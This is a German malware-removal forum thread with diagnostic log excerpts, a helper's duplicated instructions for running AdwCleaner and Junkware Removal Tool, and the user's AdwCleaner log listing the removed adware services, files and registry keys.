FirewallRules: [{72C356B8-CB26-4DEC-BB66-1AD93604839B}] => (Allow) C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
FirewallRules: [{530DE27F-6C7A-4697-9DB1-0BB50A971DAA}] => (Allow) C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
FirewallRules: [{B955008F-C21E-4141-A531-9F2BEA4B6C5C}] => (Allow) C:\Users\maikp\AppData\Local\Temp\is-1Q78S.tmp\download\MiniThunderPlatform.exe

==================== Wiederherstellungspunkte =========================

14-10-2016 17:55:01 Removed Minecraft
17-10-2016 18:51:40 Malwarebytes Anti-Rootkit Restore Point
19-10-2016 12:06:48 Revo Uninstaller's restore point - System Healer

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (10/19/2016 01:35:01 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Die erweiterbare Leistungsindikator-DLL rdyboost kann nicht geladen werden. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Windows-Fehlercode.

Error: (10/19/2016 01:26:44 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-CHK5R9U)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{f674e533-89e4-4ddc-97be-fb63f5e218fa}“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (10/19/2016 01:26:44 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-CHK5R9U)
Description: Das Paket „Microsoft.MicrosoftEdge_38.14393.0.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{697220a4-0dbf-4ebc-afdb-dd396f92a2ae}“ wurde beendet, da das Anhalten zu lange dauerte.

Error: (10/19/2016 12:30:44 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070006, Das Handle ist ungültig.
.


Vorgang:
  Asynchroner Vorgang wird ausgeführt

Kontext:
  Aktueller Status: DoSnapshotSet

Error: (10/19/2016 12:29:32 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (10/19/2016 12:26:56 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070006, Das Handle ist ungültig.
.


Vorgang:
  Asynchroner Vorgang wird ausgeführt

Kontext:
  Aktueller Status: DoSnapshotSet

Error: (10/19/2016 12:24:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (10/19/2016 12:22:07 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070006, Das Handle ist ungültig.
.


Vorgang:
  Asynchroner Vorgang wird ausgeführt

Kontext:
  Aktueller Status: DoSnapshotSet

Error: (10/19/2016 12:20:57 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (10/19/2016 12:19:11 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "QueryFullProcessImageNameW" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070006, Das Handle ist ungültig.
.


Vorgang:
  Asynchroner Vorgang wird ausgeführt

Kontext:
  Aktueller Status: DoSnapshotSet


Systemfehler:
=============
Error: (10/19/2016 01:12:43 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/19/2016 01:10:42 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Uwiseferesy" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.

Error: (10/19/2016 01:10:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Quoteex" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/19/2016 01:10:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Bokvunnu" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (10/19/2016 12:02:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Yhid Updater" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 400 Millisekunden durchgeführt: Neustart des Diensts.

Error: (10/19/2016 12:02:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "A664B55A-D881-48A8-bEA5-02B80DDCA170" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 400 Millisekunden durchgeführt: Neustart des Diensts.

Error: (10/19/2016 11:08:47 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Erkennung interaktiver Dienste" wurde mit folgendem Fehler beendet:
Unzulässige Funktion.

Error: (10/19/2016 11:05:54 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/18/2016 12:48:31 PM) (Source: DCOM) (EventID: 10016) (User: DESKTOP-CHK5R9U)
Description: Durch die Berechtigungseinstellungen für "Computerstandard" wird dem Benutzer "DESKTOP-CHK5R9U\maikp" (SID: S-1-5-21-1190326282-1682839636-2826347982-1002) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{C2F03A33-21F5-47FA-B4BB-156362A2F239}
 und der APPID
{316CDED5-E4AE-4B15-9113-7055D84DCC97}
 im Anwendungscontainer "Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy" (SID: S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (10/18/2016 12:41:34 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\SYSTEM" (SID: S-1-5-18) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 und der APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.


CodeIntegrity:
===================================
  Date: 2016-10-19 13:26:36.753
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:36.182
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:35.830
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:35.478
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:29.395
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:29.068
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:28.777
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:28.569
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:28.242
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.

  Date: 2016-10-19 13:26:27.254
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\dnsapi.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: AMD A4-6300 APU with Radeon(tm) HD Graphics
Prozentuale Nutzung des RAM: 22%
Installierter physikalischer RAM: 7364.74 MB
Verfügbarer physikalischer RAM: 5710.54 MB
Summe virtueller Speicher: 8516.74 MB
Verfügbarer virtueller Speicher: 6839.42 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:916.15 GB) (Free:886.35 GB) NTFS
Drive e: (INTENSO) (Removable) (Total:14.44 GB) (Free:14.44 GB) FAT32

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 9CFC33A7)

Partition: GPT.

========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 14.5 GB) (Disk ID: C765FED1)
Partition 1: (Active) - (Size=14.5 GB) - (Type=0C)

==================== Ende von Addition.txt ============================

cosinus 19.10.2016 15:24
Adware/Junkware/Toolbars entfernen

Alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop!
Virenscanner jetzt vor dem Einsatz dieser Tools bitte komplett deaktivieren!

1. Schritt: adwCleaner

Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).




2. Schritt: JRT - Junkware Removal Tool

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


cosinus 19.10.2016 15:24
Adware/Junkware/Toolbars entfernen

Alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop!
Virenscanner jetzt vor dem Einsatz dieser Tools bitte komplett deaktivieren!

1. Schritt: adwCleaner

Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).




2. Schritt: JRT - Junkware Removal Tool

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


RonnyP 19.10.2016 16:29
Hi, hier die Logs.

AdwCleaner

Code:
# AdwCleaner v6.021 - Bericht erstellt am 19/10/2016 um 17:20:32
# Aktualisiert am 06/10/2016 von ToolsLib
# Datenbank : 2016-10-18.1 [Server]
# Betriebssystem : Windows 10 Home  (X64)
# Benutzername : maikp - DESKTOP-CHK5R9U
# Gestartet von : E:\AdwCleaner_6.021.exe
# Modus: Löschen
# Unterstützung : https://toolslib.net/forum



***** [ Dienste ] *****

[-] Dienst gelöscht: FJgZVrMA
[-] Dienst gelöscht: SMUpd
[-] Dienst gelöscht: SMUpdd
[-] Dienst gelöscht: ProntSpooler
[-] Dienst gelöscht: wdsvc
[-] Dienst gelöscht: backlh
[-] Dienst gelöscht: Quoteex
[-] Dienst gelöscht: winsaber
[-] Dienst gelöscht: NetUtils2016
[-] Dienst gelöscht: NetUtils2016srv
[-] Dienst gelöscht: Nettrans
[-] Dienst gelöscht: Noije
[-] Dienst gelöscht: Bokvunnu
[-] Dienst gelöscht: CHNGTSvc
[-] Dienst gelöscht: InterHop


***** [ Ordner ] *****

[-] Ordner gelöscht: C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009
[-] Ordner gelöscht: C:\ProgramData\0781609d-1fb5-0
[-] Ordner gelöscht: C:\ProgramData\0781609d-5e85-1
[-] Ordner gelöscht: C:\Users\maikp\AppData\Local\tuto_monetize_120161008
[-] Ordner gelöscht: C:\Users\maikp\AppData\Local\WebDiscoverBrowser
[-] Ordner gelöscht: C:\Users\maikp\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
[-] Ordner gelöscht: C:\Users\maikp\AppData\Roaming\WikiZ
[-] Ordner gelöscht: C:\Users\maikp\AppData\Roaming\HDWallPaper
[#] Ordner mit Neustart gelöscht: C:\Users\maikp\AppData\Roaming\Geunfy
[-] Ordner gelöscht: C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpaceSoundPro 1.0
[-] Ordner gelöscht: C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WikiZ
[-] Ordner gelöscht: C:\Program Files\WebDiscoverBrowser
[-] Ordner gelöscht: C:\Program Files\Common Files\Noobzo
[-] Ordner gelöscht: C:\ProgramData\SearchModule
[-] Ordner gelöscht: C:\ProgramData\Logic Handler
[-] Ordner gelöscht: C:\ProgramData\Quoteex
[-] Ordner gelöscht: C:\ProgramData\Quoteexs
[-] Ordner gelöscht: C:\ProgramData\ChelfNotify
[#] Ordner mit Neustart gelöscht: C:\ProgramData\quoteex
[-] Ordner gelöscht: C:\ProgramData\Thunder Network
[-] Ordner gelöscht: C:\ProgramData\NetworkPacketManitor
[-] Ordner gelöscht: C:\Program Files (x86)\FunFeedr
[-] Ordner gelöscht: C:\Program Files (x86)\WebShield
[-] Ordner gelöscht: C:\Program Files (x86)\OtherSearch
[-] Ordner gelöscht: C:\Program Files (x86)\mpck
[-] Ordner gelöscht: C:\Program Files (x86)\WinSaber
[#] Ordner mit Neustart gelöscht: C:\Program Files (x86)\winsaber
[-] Ordner gelöscht: C:\Program Files (x86)\InterHop
[-] Ordner gelöscht: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\Roaming\System Healer
[-] Ordner gelöscht: C:\WINDOWS\SysWoW64\config\systemprofile\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
[-] Ordner gelöscht: C:\Users\maikp\AppData\Local\Programs\GEN
[-] Ordner gelöscht: C:\uninst


***** [ Dateien ] *****

[-] Datei gelöscht: C:\WINDOWS\SysNative\bi3.exe
[-] Datei gelöscht: C:\WINDOWS\SysNative\NetUtils2016.dll
[-] Datei gelöscht: C:\ProgramData\smp2.exe
[-] Datei gelöscht: C:\exervice.exe
[#] Datei gelöscht: C:\ProgramData\smp2.exe
[-] Datei gelöscht: C:\WINDOWS\SysWoW64\findit.xml
[-] Datei gelöscht: C:\WINDOWS\SysWoW64\NetUtils2016.exe
[-] Datei gelöscht: C:\Users\maikp\AppData\Local\Temp\zdengine.log
[-] Datei gelöscht: C:\Users\maikp\AppData\Local\Temp\ziengine.ini.log
[-] Datei gelöscht: C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe
[-] Datei gelöscht: C:\Users\maikp\AppData\Local\Apps\2.0\abril.InstallLog
[-] Datei gelöscht: C:\Users\maikp\AppData\Local\Apps\2.0\abril.InstallState
[-] Datei gelöscht: C:\Users\maikp\AppData\Roaming\Mozilla\Firefox\Profiles\1nisvqqo.default\searchplugins\smod.xml


***** [ DLL ] *****

[!] Datei nicht desinfiziert:  C:\WINDOWS\System32\dnsapi.dll
[!] Datei nicht desinfiziert:  C:\WINDOWS\SysWoW64\dnsapi.dll


***** [ WMI ] *****



***** [ Verknüpfungen ] *****



***** [ Aufgabenplanung ] *****



***** [ Registrierungsdatenbank ] *****

[#] Schlüssel mit Neustart gelöscht: HKLM\SYSTEM\CurrentControlSet\services\qykocisu
[-] Wert gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [WINCOMVL5]
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ProntSpooler
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\ProntSpooler
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Schlüssel gelöscht: HKU\.DEFAULT\Software\System Healer
[-] Schlüssel gelöscht: HKU\.DEFAULT\Software\WebDiscoverBrowser
[-] Schlüssel gelöscht: HKU\.DEFAULT\Software\b`nl{y
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\FunFeedr
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Installer
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\powerpack
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\WebDiscoverBrowser
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\MICROSOFT\OTUT
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Wizzlabs
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\MICROSOFT\IDSC
[-] Schlüssel gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\AppDataLow\Software\DailyBee
[#] Schlüssel mit Neustart gelöscht: HKU\S-1-5-18\Software\System Healer
[#] Schlüssel mit Neustart gelöscht: HKU\S-1-5-18\Software\WebDiscoverBrowser
[#] Schlüssel mit Neustart gelöscht: HKU\S-1-5-18\Software\b`nl{y
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\FunFeedr
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Installer
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\powerpack
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\WebDiscoverBrowser
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\MICROSOFT\OTUT
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Wizzlabs
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\MICROSOFT\IDSC
[-] Schlüssel gelöscht: HKU\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-18\Software\Yhid
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\AppDataLow\Software\DailyBee
[-] Schlüssel gelöscht: HKLM\SOFTWARE\SearchModule
[-] Schlüssel gelöscht: HKLM\SOFTWARE\youndooSoftware
[-] Schlüssel gelöscht: HKLM\SOFTWARE\mtQuoteex
[-] Schlüssel gelöscht: HKLM\SOFTWARE\OtherSearch
[-] Schlüssel gelöscht: HKLM\SOFTWARE\mtApService
[-] Schlüssel gelöscht: HKLM\SOFTWARE\b`nl{y
[-] Schlüssel gelöscht: HKLM\SOFTWARE\WinSaberSvc
[-] Schlüssel gelöscht: HKLM\SOFTWARE\InterHop
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FunFeedr
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WebShield
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DailyBee
[-] Schlüssel gelöscht: HKLM\SOFTWARE\CLIENTS\Corner Sunshine
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\FunFeedr
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Installer
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\powerpack
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\WebDiscoverBrowser
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\MICROSOFT\OTUT
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Wizzlabs
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\MICROSOFT\IDSC
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\AppDataLow\Software\DailyBee
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\SearchModule
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\SpaceSoundPro
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\WebDiscoverBrowser
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\b`nl{y
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\HDWallpaper
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{fd13f4a2-b0d8-4cad-9ccf-d4128eaf25ff}_is1
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SOFTWARE\CLIENTS\Corner Sunshine
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
[-] Schlüssel gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
[#] Schlüssel mit Neustart gelöscht: [x64] HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
[-] Wert gelöscht: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Software\Microsoft\Windows\CurrentVersion\Run [WebDiscoverBrowser]
[#] Wert mit Neustart gelöscht: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [WebDiscoverBrowser]
[#] Wert mit Neustart gelöscht: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [WebDiscoverBrowser]
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Internet Explorer\SEARCHSCOPES\IELNKSRCH
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe
[-] Schlüssel gelöscht: HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}
[-] Wert gelöscht: HKCU\Environment [SNF]
[-] Wert gelöscht: HKCU\Environment [SNP]
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
[-] Schlüssel gelöscht: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}
[#] Schlüssel mit Neustart gelöscht: HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting
[#] Schlüssel mit Neustart gelöscht: HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\IELNKSRCH
[-] Schlüssel gelöscht: HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
[-] Schlüssel gelöscht: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Quoteex.exe


***** [ Browser ] *****



*************************

:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: Proxy Einstellungen zurückgesetzt
